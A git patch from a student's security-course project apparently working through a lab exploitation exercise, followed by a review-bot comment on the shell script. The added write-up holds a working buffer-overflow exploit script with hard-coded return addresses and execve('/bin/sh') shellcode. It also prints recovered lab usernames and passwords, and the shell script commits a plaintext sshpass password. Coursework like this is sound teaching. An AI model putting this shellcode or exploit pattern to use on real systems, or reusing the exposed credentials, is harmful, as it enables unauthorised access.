From 62aac5ca7c8cbfb392f0a479dc5bbed4c57b7451 Mon Sep 17 00:00:00 2001
From: Recolic Keghart <root@recolic.net>
Date: Fri, 8 Feb 2019 20:52:36 -0800
Subject: [PATCH] p1 done

---
 proj1/explain.md | 44 +++++++++++++++++++++++++++++++++++++++++++-
 proj1/ssh.sh     | 11 ++++++++---
 2 files changed, 51 insertions(+), 4 deletions(-)

diff --git a/proj1/explain.md b/proj1/explain.md
index 349d07a..2d094ab 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -1,4 +1,4 @@
-# 1
+## 1
 
 The makefile is interesting and I think the professor tried his best to
 make the program unsafe.
@@ -56,3 +56,45 @@ You have to let it all go. Fear, doubt, and disbelief. Free your mind.
 Next username: smith
 Next password: 37ZFBrAPm8
 ```
+
+My code is attached below
+```
+############# egg3
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+
+fill = "0123456789abcdef0123456789abcdef01234567"
+#cs161-ace# raddr = "bffffa40"
+#cs161-atw# raddr = "bffffad0"
+raddr = "bffffad0"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+########################################################################################### <- append an endline (0x0a, \n)
+
+payload = revert(fill) + revert(raddr) + (shellcode)
+print(payload)
+
+import binascii
+
+b = binascii.unhexlify(payload)
+with open('input.txt','wb+') as f:
+    f.write(b)
+############# egg
+#!/bin/bash
+
+./egg3 > /dev/null
+cat input.txt # | invoke dejavu
+```
+
+## 2
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index 8eb87e9..5254c96 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -1,4 +1,9 @@
 #!/bin/sh
-#echo 'Use password r4e8kWpeFC'
-#ssh vsftpd@localhost -p 16161
-sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+if [[ $1 == remote ]]; then
+    echo 'Connecting ucb cs161 autograde machine...'
+    u=atw
+    ssh -t cs161-$u@hive$((36#${u:2}%26+1)).cs.berkeley.edu \~cs161/proj1/start
+else
+    echo 'Connecting localhost...'
+    sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+fi
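Review bot: The new `if [[ $1 == remote ]]; then` is a bash-only test, but the script keeps the `#!/bin/sh` shebang on the context line above it; where sh is dash the script fails with a syntax error before either branch runs, so the first line should become `#!/bin/bash` (the `$((36#${u:2}%26+1))` arithmetic in the remote branch is also bash-specific, so rewriting the test alone would not be enough). Separately, the else branch still commits the login password into the script itself; reading it from the environment with `sshpass -e ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no vsftpd@localhost -p 16161` (password supplied in `SSHPASS`) keeps the credential out of version control, and the sshpass documentation describes `-p` as its least secure mode. If the old `-p` form is kept for convenience, a comment such as `# local lab credential only; do not reuse elsewhere` would at least mark its scope.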
-- 
GitLab